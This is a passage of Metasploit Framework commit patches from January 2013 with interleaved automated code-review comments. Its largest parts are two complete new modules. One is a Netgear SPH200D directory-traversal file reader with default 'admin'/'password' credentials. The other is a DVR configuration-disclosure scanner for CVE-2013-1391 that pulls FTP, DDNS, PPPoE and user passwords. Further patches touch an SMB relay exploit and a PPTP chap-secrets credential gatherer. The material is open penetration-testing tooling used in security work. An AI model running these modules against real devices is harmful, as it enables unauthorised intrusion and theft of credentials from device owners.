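Review bot: The three checks added to `scanner_postscan` decide vulnerability from the SSDP `Server` banner alone, yet `report_vuln` records the result without saying so. A rewritten banner or a vendor build with a backported fix then looks the same as a confirmed finding in the database. Put the basis into the record, e.g. `:info => "Inferred from SSDP Server banner: #{res[:info][:server]}"`, and add a comment above the regexes stating that they are version-string matches only and need confirmation before remediation is prioritised. The nested `each` that fills `vrefs` can be `vrefs = res[:vulns].map { |v| v[:refs] }.flatten`. `scanner_postscan` begins and ends outside this hunk.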
diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index 23297bf0cdb1..e5111f3176e8 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -16,7 +16,7 @@ def initialize super( 'Name' => 'UPnP SSDP M-SEARCH Information Discovery', 'Description' => 'Discover information from UPnP-enabled systems', - 'Author' => 'todb', + 'Author' => [ 'todb', 'hdm'], # Original scanenr module and vuln info reporter, respectively 'License' => MSF_LICENSE ) @@ -26,6 +26,10 @@ def initialize ], self.class) end + def rport + datastore['RPORT'] + end + def setup super @msearch_probe = @@ -43,10 +47,13 @@ def scanner_prescan(batch) end def scan_host(ip) + vprint_status "#{ip}:#{rport} - SSDP - sending M-SEARCH probe" scanner_send(@msearch_probe, ip, datastore['RPORT']) end def scanner_postscan(batch) + print_status "No SSDP endpoints found." if @results.empty? + @results.each_pair do |skey,res| sinfo = res[:service] next unless sinfo From f5eaa87c80a51cc43705e7fff37d273049e91c1a Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Tue, 29 Jan 2013 01:05:18 -0600 Subject: [PATCH 191/421] comment typo --- modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index e5111f3176e8..fba5a396e7c2 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -16,7 +16,7 @@ def initialize super( 'Name' => 'UPnP SSDP M-SEARCH Information Discovery', 'Description' => 'Discover information from UPnP-enabled systems', - 'Author' => [ 'todb', 'hdm'], # Original scanenr module and vuln info reporter, respectively + 'Author' => [ 'todb', 'hdm'], # Original scanner module and vuln info reporter, respectively 'License' => MSF_LICENSE ) 
From 929814dabf2997a322bb8f7c50c1c0b2f81765d1 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Tue, 29 Jan 2013 11:04:20 -0600 Subject: [PATCH 192/421] Update modules/exploits/multi/http/rails_json_yaml_code_exec.rb MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Removes unnecessary include.  Tested on 3.0.19 and 2.3.15. --- modules/exploits/multi/http/rails_json_yaml_code_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index efa29002c81e..4066d047fef5 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -10,7 +10,6 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info = {}) From 55600ce2761a9dd0ccd852ea8feddc901bd46e3d Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Tue, 29 Jan 2013 11:46:02 -0600 Subject: [PATCH 193/421] Update modules/exploits/multi/http/rails_xml_yaml_code_exec.rb MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Remove unecessary include.  Tested against rails 3.2.10. --- modules/exploits/multi/http/rails_xml_yaml_code_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb index 0d02e885fdc8..8743f76106cd 100644 --- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb @@ -10,7 +10,6 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info = {}) From deb9385181433c5fa1b91bdebbdf5a022614732b Mon Sep 17 00:00:00 2001 
From: lmercer <lmercer@mit.edu> Date: Tue, 29 Jan 2013 15:19:35 -0500 Subject: [PATCH 194/421] Patch for smb_relay.rb to allow the share written to, to be defined in an option As described in Redmine Feature #5455 --- modules/exploits/windows/smb/smb_relay.rb | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index 0bc45cb8a4f9..c66058140402 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -94,7 +94,8 @@ module is not able to clean up after itself. The service and payload register_options( [ - OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"]) + OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"]), + OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ]) ], self.class ) end @@ -124,8 +125,8 @@ def smb_haxor(c) return end - print_status("Connecting to the ADMIN$ share...") - rclient.connect("ADMIN$") + print_status("Connecting to the defined share...") + rclient.connect(datastore['SHARE']) @pwned[smb[:rhost]] = true @@ -155,8 +156,8 @@ def smb_haxor(c) print_status("Created \\#{filename}...") - # Disconnect from the ADMIN$ - rclient.disconnect("ADMIN$") + # Disconnect from the SHARE + rclient.disconnect(datastore['SHARE']) print_status("Connecting to the Service Control Manager...") rclient.connect("IPC$") @@ -295,7 +296,7 @@ def smb_haxor(c) rclient.disconnect("IPC$") print_status("Deleting \\#{filename}...") - rclient.connect("ADMIN$") + rclient.connect(datastore['SHARE']) rclient.delete("\\#{filename}") end From 77ea5a40f54137d6722b808b6f8b7f249160cd8f Mon Sep 17 00:00:00 2001 
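Review bot: In `smb_haxor` the new status line `print_status("Connecting to the defined share...")` prints the same text for every value of `SHARE`, so the log no longer records where the file was written. The module description in the first hunk's context says the module cannot clean up after itself, so the log is what an operator or reviewer relies on to find the leftover file. Name the share: `print_status("Connecting to the #{datastore['SHARE']} share...")`. The comment `# Disconnect from the SHARE` would read better as `# Disconnect from the configured share`. `smb_haxor` starts and ends outside these hunks.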
From: sinn3r <msfsinn3r@gmail.com> Date: Tue, 29 Jan 2013 14:19:42 -0600 Subject: [PATCH 195/421] Do report_auth_info --- modules/post/linux/gather/pptpd_chap_secrets.rb | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb index 1972b0cba873..267f95d19e64 100644 --- a/modules/post/linux/gather/pptpd_chap_secrets.rb +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -81,6 +81,15 @@ def extract_secrets(data) secret = (found[2] || '').strip ip = (found[3] || '').strip + report_auth_info({ + :host => session.sock.peerhost, + :port => 1723, #PPTP port + :sname => 'pptp', + :user => client, + :pass => secret, + :active => true + }) + tbl << [client, server, secret, ip] end From aaf18f0257ba9b8988eb92c0c9624b442fb15c54 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Tue, 29 Jan 2013 14:22:19 -0600 Subject: [PATCH 196/421] EOL whitespace, yo. --- modules/exploits/windows/local/payload_inject.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 0e748cb6072b..ac2ef8c8456e 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -88,7 +88,7 @@ def has_pid?(pid) pids = [] procs.each do |p| - found_pid = p['pid'] + found_pid = p['pid'] return true if found_pid == pid end @@ -173,4 +173,4 @@ def inject_into_pid(pid) end end -end \ No newline at end of file +end From ea5e993bf3f2e566429e124e34b55f190c71f804 Mon Sep 17 00:00:00 2001 From: m-1-k-3 <michael.messner@integralis.com> Date: Tue, 29 Jan 2013 22:02:29 +0100 Subject: [PATCH 197/421] initial --- .../admin/http/netgear_sph200d_traversal.rb | 134 ++++++++++++++++++ 1 file changed, 134 insertions(+) create mode 100644 modules/auxiliary/admin/http/netgear_sph200d_traversal.rb 
diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb new file mode 100644 index 000000000000..dde540899607 --- /dev/null +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb 
@@ -0,0 +1,134 @@ +## +# $Id: tomcat_utf8_traversal.rb 14975 2012-03-18 01:39:05Z rapid7 $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::WmapScanServer + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Netgear SPH200D - Directory Traversal Vulnerability', + 'Version' => '$$', + 'Description' => %q{ + This module exploits a directory traversal vulnerablity which is present + in Netgear SPH200D Skype telephone + You may wish to change SENSITIVE_FILES (hosts sensitive files), RPORT depending + on your environment. + }, + 'References' => + [ + [ 'URL', 'http://support.netgear.com/product/SPH200D' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-002' ], + ], + 'Author' => [ 'm-1-k-3' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + Opt::RPORT(80), + OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line", + File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), + + ], self.class) + end + + def extract_words(wordfile) + return [] unless wordfile && File.readable?(wordfile) + begin + words = File.open(wordfile, "rb") do |f| + f.read + end + rescue + return [] + end + save_array = words.split(/\r?\n/) + return save_array + end + + def find_files(files,user,pass) + traversal = '/../..' 
+ + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => traversal << files, + 'basic_auth' => "#{user}:#{pass}" + }) + if (res and res.code == 200) + print_status("Request may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n") + print_status("#{res.body}") + elsif (res and res.code) + vprint_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}") + end + end + + def run_host(ip) + user = datastore['USERNAME'] + if datastore['PASSWORD'].nil? + pass = "" + else + pass = datastore['PASSWORD'] + end + + print_status("Trying to login with #{user} / #{pass}") + + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'basic_auth' => "#{user}:#{pass}" + }) + + unless (res.kind_of? Rex::Proto::Http::Response) + vprint_error("#{target_url} not responding") + end + + return :abort if (res.code == 404) + + if [200, 301, 302].include?(res.code) + print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") + else + print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'") + return :abort + end + + rescue ::Rex::ConnectionError + vprint_error("Failed to connect to the web server") + return :abort + end + + begin + print_status("Attempting to connect to #{rhost}:#{rport}") + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => '/', + 'basic_auth' => "#{user}:#{pass}" + }) + + if (res) + extract_words(datastore['SENSITIVE_FILES']).each do |files| + find_files(files,user,pass) unless files.empty? + end + end + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + rescue ::Timeout::Error, ::Errno::EPIPE + end + end +end From 8a9dba2ffec1ad8de59f4fba3ad42c2e3d16cf17 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Tue, 29 Jan 2013 16:35:36 -0600 Subject: [PATCH 198/421] Updates host info --- modules/post/linux/gather/pptpd_chap_secrets.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
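Review bot: In `run_host` the `unless (res.kind_of? Rex::Proto::Http::Response)` branch only logs and then falls through to `res.code`, so a nil response raises NoMethodError instead of aborting. The log line also interpolates `target_url`, which nothing in this file defines (confirm that a mixin provides it). Change the branch body to `vprint_error("#{rhost}:#{rport} not responding")` followed by `return :abort`. The second `begin` block ends in two empty `rescue` clauses that discard connection errors silently; log them with `vprint_error` as the first block does. The header `$Id: tomcat_utf8_traversal.rb ...$` and `'Version' => '$$'` are left over from another module and should be removed.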
diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb index 267f95d19e64..97d7ce6adc18 100644 --- a/modules/post/linux/gather/pptpd_chap_secrets.rb +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -82,7 +82,7 @@ def extract_secrets(data) ip = (found[3] || '').strip report_auth_info({ - :host => session.sock.peerhost, + :host => datastore['RHOST'], :port => 1723, #PPTP port :sname => 'pptp', :user => client, From b1f8b87f1495ecadd3737fbbe53d22e81e41c4d1 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Tue, 29 Jan 2013 17:02:43 -0600 Subject: [PATCH 199/421] Chmod -x the joomla modules. Also fix a title typo joomla_pages was incorrectly titled as "Joomla Version Scanner," which of course is actually joomla_version. --- modules/auxiliary/scanner/http/joomla_pages.rb | 2 +- modules/auxiliary/scanner/http/joomla_plugins.rb | 0 modules/auxiliary/scanner/http/joomla_version.rb | 0 3 files changed, 1 insertion(+), 1 deletion(-) mode change 100755 => 100644 modules/auxiliary/scanner/http/joomla_pages.rb mode change 100755 => 100644 modules/auxiliary/scanner/http/joomla_plugins.rb mode change 100755 => 100644 modules/auxiliary/scanner/http/joomla_version.rb diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb old mode 100755 new mode 100644 index 77218063a5af..78b45d33e948 --- a/modules/auxiliary/scanner/http/joomla_pages.rb +++ b/modules/auxiliary/scanner/http/joomla_pages.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary # Joomscan and various MSF modules for code examples. def initialize super( - 'Name' => 'Joomla Version Scanner', + 'Name' => 'Joomla Page Scanner', 'Description' => %q{ This module scans a Joomla install for common pages. }, diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb old mode 100755 new mode 100644 
diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb old mode 100755 new mode 100644 From c5ab059a1abf57a388edd6fa3103c6e2fc914b25 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Tue, 29 Jan 2013 18:24:11 -0600 Subject: [PATCH 200/421] Really fix the :host key --- modules/post/linux/gather/pptpd_chap_secrets.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb index 97d7ce6adc18..e360a816ba59 100644 --- a/modules/post/linux/gather/pptpd_chap_secrets.rb +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -82,11 +82,12 @@ def extract_secrets(data) ip = (found[3] || '').strip report_auth_info({ - :host => datastore['RHOST'], + :host => session.session_host, :port => 1723, #PPTP port :sname => 'pptp', :user => client, :pass => secret, + :type => 'password', :active => true }) From 668520d8d9458d89e79b00963e88508ac800e7d1 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 30 Jan 2013 17:22:03 +0100 Subject: [PATCH 201/421] added module for cve-2013-1391 --- .../scanner/misc/dvr_config_disclosure.rb | 208 ++++++++++++++++++ 1 file changed, 208 insertions(+) create mode 100644 modules/auxiliary/scanner/misc/dvr_config_disclosure.rb diff --git a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb new file mode 100644 index 000000000000..11d31c5c1d84 --- /dev/null +++ b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb 
@@ -0,0 +1,208 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Multiple DVR Manufacturers Configuration Disclosure', + 'Description' => %q{ + This module takes advantage of an authentication bypass vulnerability at the + web interface of multiple manufacturers DVR systems, which allows to retrieve the + device configuration. + }, + 'Author' => + [ + 'Alejandro Ramos', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-1391' ], + [ 'URL', 'http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html' ] + ], + 'License' => MSF_LICENSE + ) + + end + + def get_ppooe_credentials(conf) + + user = "" + password = "" + + if conf =~ /PPPOE_USER=(.*)/ + user = $1 + end + + if conf =~ /PPPOE_PASSWORD=(.*)/ + password = $1 + end + + if user.empty? or password.empty? + return + end + + info = "PPPOE credentials for #{rhost}, user: #{user}, password: #{password}" + + report_note({ + :host => rhost, + :data => info, + :type => "dvr.pppoe.conf", + :sname => 'pppoe', + :update => :unique_data + }) + + end + + + def get_ddns_credentials(conf) + hostname = "" + user = "" + password = "" + + if conf =~ /DDNS_HOSTNAME=(.*)/ + hostname = $1 + end + + if conf =~ /DDNS_USER=(.*)/ + user = $1 + end + + if conf =~ /DDNS_PASSWORD=(.*)/ + password = $1 + end + + if hostname.empty? 
+ return + end + + info = "DDNS credentials for #{hostname}, user: #{user}, password: #{password}" + + report_note({ + :host => rhost, + :data => info, + :type => "dvr.ddns.conf", + :sname => 'ddns', + :update => :unique_data + }) + + end + + def get_ftp_credentials(conf) + server = "" + user = "" + password = "" + port = "" + + if conf =~ /FTP_SERVER=(.*)/ + server = $1 + end + + if conf =~ /FTP_USER=(.*)/ + user = $1 + end + + if conf =~ /FTP_PASSWORD=(.*)/ + password = $1 + end + + if conf =~ /FTP_PORT=(.*)/ + port = $1 + end + + if server.empty? + return + end + + report_auth_info({ + :host => server, + :port => port, + :sname => 'ftp', + :duplicate_ok => false, + :user => user, + :pass => password + }) + end + + def get_dvr_credentials(conf) + conf.scan(/USER(\d+)_USERNAME/).each { |match| + user = "" + password = "" + active = "" + + user_id = match[0] + + if conf =~ /USER#{user_id}_LOGIN=(.*)/ + active = $1 + end + + if conf =~ /USER#{user_id}_USERNAME=(.*)/ + user = $1 + end + + if conf =~ /USER#{user_id}_PASSWORD=(.*)/ + password = $1 + end + + if active == "0" + user_active = false + else + user_active = true + end + + report_auth_info({ + :host => rhost, + :port => rport, + :sname => 'dvr', + :duplicate_ok => false, + :user => user, + :pass => password, + :active => user_active + }) + } + end + + def run_host(ip) + + res = send_request_cgi({ + 'uri' => '/DVR.cfg', + 'method' => 'GET' + }) + + if not res or res.code != 200 or res.body.empty? 
or res.body !~ /CAMERA/ + vprint_error("#{rhost}:#{rport} - DVR configuration not found") + return + end + + p = store_loot("dvr.configuration", "text/plain", rhost, res.body, "DVR.cfg") + vprint_good("#{rhost}:#{rport} - DVR configuration stored in #{p}") + + conf = res.body + + get_ftp_credentials(conf) + get_dvr_credentials(conf) + get_ddns_credentials(conf) + get_ppooe_credentials(conf) + + dvr_name = "" + if res.body =~ /DVR_NAME=(.*)/ + dvr_name = $1 + end + + report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "DVR NAME: #{dvr_name}") + print_good("#{rhost}:#{rport} DVR #{dvr_name} found") + end + +end From cf6aae7bb7593898127236208b0d019ca53647f7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 30 Jan 2013 17:37:41 +0100 Subject: [PATCH 202/421] add checks for enabled services --- .../scanner/misc/dvr_config_disclosure.rb | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb index 11d31c5c1d84..b2e36eaefa5d 100644 --- a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb +++ b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb @@ -41,6 +41,13 @@ def get_ppooe_credentials(conf) user = "" password = "" + enabled = "" + + if conf =~ /PPPOE_EN=(\d)/ + enabled = $1 + end + + return if enabled == "0" if conf =~ /PPPOE_USER=(.*)/ user = $1 @@ -71,6 +78,13 @@ def get_ddns_credentials(conf) hostname = "" user = "" password = "" + enabled = "" + + if conf =~ /DDNS_EN=(\d)/ + enabled = $1 + end + + return if enabled == "0" if conf =~ /DDNS_HOSTNAME=(.*)/ hostname = $1 From de544dc3d477752c60bfab71847999b393c57e43 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 30 Jan 2013 11:25:43 -0600 Subject: [PATCH 203/421] Handle multiple IPs --- modules/post/linux/gather/pptpd_chap_secrets.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) 
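Review bot: Every `KEY=(.*)` capture in the new `dvr_config_disclosure.rb` is stored unstripped. If the device serves the file with CRLF line endings (not visible here), each user name, password and host passed to `report_auth_info` and `report_note` would end in `\r`. The same match-and-assign pattern is repeated about fifteen times and could be one helper: `def conf_value(conf, key)` / `conf[/^#{Regexp.escape(key)}=(.*)$/, 1].to_s.strip` / `end`. In `get_ftp_credentials`, `:port => port` is a string and stays `""` when `FTP_PORT` is absent, so it should be converted to an integer with a fallback. `get_ppooe_credentials` misspells PPPoE in both the definition and the call in `run_host`.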
diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb index e360a816ba59..b351fbbb7217 100644 --- a/modules/post/linux/gather/pptpd_chap_secrets.rb +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -71,7 +71,7 @@ def extract_secrets(data) # If this line is commented out, ignore it next if l =~ /^[[:blank:]]*#/ - found = l.scan(/(.+)[[:blank:]]+(.+)[[:blank:]]+(.+)[[:blank:]]+(.+)$/).flatten + found = l.split # Nothing is found, skip! next if found.empty? @@ -79,7 +79,7 @@ def extract_secrets(data) client = (found[0] || '').strip server = (found[1] || '').strip secret = (found[2] || '').strip - ip = (found[3] || '').strip + ip = (found[3,found.length] * ", " || '').strip report_auth_info({ :host => session.session_host, From 95cc84f5e860600fff524c1639561cb419dcbfa7 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 30 Jan 2013 15:42:21 -0600 Subject: [PATCH 204/421] Updates normalize_uri() This function should not remove the trailing slash, because you may end up getting a different HTTP response. The new function also allows multiple URIs as argument, and will just merge & normalize them together. [SeeRM #7733] --- lib/msf/core/exploit/http/client.rb | 19 +++++++------------ 1 file changed, 7 insertions(+), 12 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 4d4fd787a602..6d0bd9336b51 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb 
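Review bot: In `(found[3,found.length] * ", " || '')` the `|| ''` is applied after the join, so it never guards anything. For a line with fewer than three fields `found[3, found.length]` is nil, and `nil * ", "` raises NoMethodError. Use `ip = Array(found[3..-1]).join(", ")`. `l.split` also cuts on any whitespace, so a quoted secret containing a space would be split and shift the remaining fields; whether such entries occur in the parsed file is not visible here. `extract_secrets` begins and ends outside this hunk.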
@@ -539,23 +539,18 @@ def target_uri # Returns a modified version of the URI that: # 1. Always has a starting slash # 2. Removes all the double slashes - # 3. Removes the trailing slash # - def normalize_uri(str) - # Makes sure there's a starting slash - unless str.to_s[0,1] == "/" - str = "/" + str.to_s - end + def normalize_uri(*strs) + new_str = strs * "/" - # Removes all double slashes - str = str.gsub!("//", "/") while str.index("//") + new_str = new_str.gsub!("//", "/") while new_str.index("//") - # Makes sure there's no trailing slash - unless str.length == 1 - str = str.gsub(/\/+$/, '') + # Makes sure there's a starting slash + unless new_str[0,1] == '/' + new_str = '/' + new_str end - str + new_str end # From d8b15daaf24060c34ca2d8a7973a8e7be35a59f4 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 30 Jan 2013 16:13:17 -0600 Subject: [PATCH 205/421] Correct rspect to the correct behavior --- spec/lib/msf/core/exploit/http/client_spec.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/spec/lib/msf/core/exploit/http/client_spec.rb b/spec/lib/msf/core/exploit/http/client_spec.rb index 73298366d42b..d32ce9e12216 100644 --- a/spec/lib/msf/core/exploit/http/client_spec.rb +++ b/spec/lib/msf/core/exploit/http/client_spec.rb @@ -56,8 +56,8 @@ unnormalized_uri[-1, 1].should == '/' end - it "should remove the trailing '/'" do - normalized_uri.should == expected_normalized_uri + it "should end with '/'" do + normalized_uri[-1, 1].should == '/' end context "with just '/'" do @@ -76,11 +76,11 @@ context "with multiple multiple trailing '/'" do let(:unnormalized_uri) do - "#{expected_normalized_uri}//" + "#{expected_normalized_uri}" end - it "should have multiple trailing '/'" do - unnormalized_uri[-2 .. -1].should == '//' + it "should have single trailing '/'" do + unnormalized_uri[-2,1].should == '/' end it "should return only one trailing '/'" do 
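Review bot: The header comment of normalize_uri drops item 3 but does not say that the method now joins all its arguments with "/" or that a trailing slash is kept. It should also state that the "//" collapse runs over the whole joined string, so the argument must be a path only; a query value such as `url=http://host` passed in would be rewritten. Suggested additions: `# 3. Joins multiple arguments with '/'` and `# 4. Keeps a trailing slash; append the query string after the call`. The loop `new_str = new_str.gsub!("//", "/") while new_str.index("//")` could also be the single call `new_str = new_str.gsub(%r{/{2,}}, '/')`.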
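Review bot: The context "with multiple multiple trailing '/'" no longer feeds multiple trailing slashes to normalize_uri, because `unnormalized_uri` is now just `"#{expected_normalized_uri}"` and the precondition only checks the second-to-last character. The collapse of a trailing "//" to one "/" is therefore not exercised any more. Keeping the input as `"#{expected_normalized_uri}//"` with the precondition `unnormalized_uri[-2 .. -1].should == '//'` would still fit the new behaviour, since only the expected output changes. `expected_normalized_uri` is defined outside the hunk, so its value is assumed here.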
@@ -122,12 +122,12 @@ normalized_uri[0, 1].should == '/' end - it "'should remove trailing '/'" do - normalized_uri[-1, 1].should_not == '/' + it "'should not remove trailing '/'" do + normalized_uri[-1, 1].should == '/' end it 'should normalize the uri' do - normalized_uri.should == expected_normalized_uri + normalized_uri.should == "#{expected_normalized_uri}/" end end From c174e6a2084719c8ec34b38a5d1f90d113b39d66 Mon Sep 17 00:00:00 2001 
From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 30 Jan 2013 23:23:41 -0600 Subject: [PATCH 206/421] Correctly use normalize_uri() normalize_uri() should be used when you're joining URIs. Because if you're merging URIs after it's normalized, you could get double slashes again. --- .../auxiliary/admin/http/typo3_sa_2009_001.rb | 4 ++- modules/auxiliary/admin/tikiwiki/tikidblib.rb | 4 +-- modules/auxiliary/dos/http/webrick_regex.rb | 2 +- .../gather/wp_w3_total_cache_hash_extract.rb | 2 +- .../http/bitweaver_overlay_type_traversal.rb | 5 ++-- .../scanner/http/clansphere_traversal.rb | 3 +- .../scanner/http/concrete5_member_list.rb | 4 +-- .../hp_sitescope_getsitescopeconfiguration.rb | 8 ++++-- ...hp_sitescope_loadfilecontent_fileaccess.rb | 8 ++++-- modules/auxiliary/scanner/http/http_put.rb | 6 ++-- .../auxiliary/scanner/http/s40_traversal.rb | 5 ++-- .../http/sap_businessobjects_user_brute.rb | 2 +- .../http/sap_businessobjects_user_enum.rb | 2 +- .../http/sap_businessobjects_version_enum.rb | 2 +- .../http/vmware_update_manager_traversal.rb | 4 +-- .../exploits/linux/http/dolibarr_cmd_exec.rb | 4 +-- .../linux/http/symantec_web_gateway_exec.rb | 4 +-- .../http/symantec_web_gateway_file_upload.rb | 4 +-- modules/exploits/linux/http/vcms_upload.rb | 4 +-- .../linux/http/webcalendar_settings_exec.rb | 7 ++--- .../exploits/linux/http/webid_converter.rb | 10 +++---- .../http/ajaxplorer_checkinstall_exec.rb | 9 +++--- .../multi/http/apprain_upload_exec.rb | 11 ++++---- .../multi/http/auxilium_upload_exec.rb | 11 ++++---- modules/exploits/multi/http/axis2_deployer.rb | 4 +-- .../multi/http/cuteflow_upload_exec.rb | 6 ++-- .../multi/http/horde_href_backdoor.rb | 4 +-- .../http/hp_sitescope_uploadfileshandler.rb | 10 +++---- .../exploits/multi/http/jboss_bshdeployer.rb | 6 ++-- .../http/jboss_deploymentfilerepository.rb | 10 +++---- .../exploits/multi/http/jboss_maindeployer.rb | 8 +++--- .../multi/http/jenkins_script_console.rb | 4 +-- 
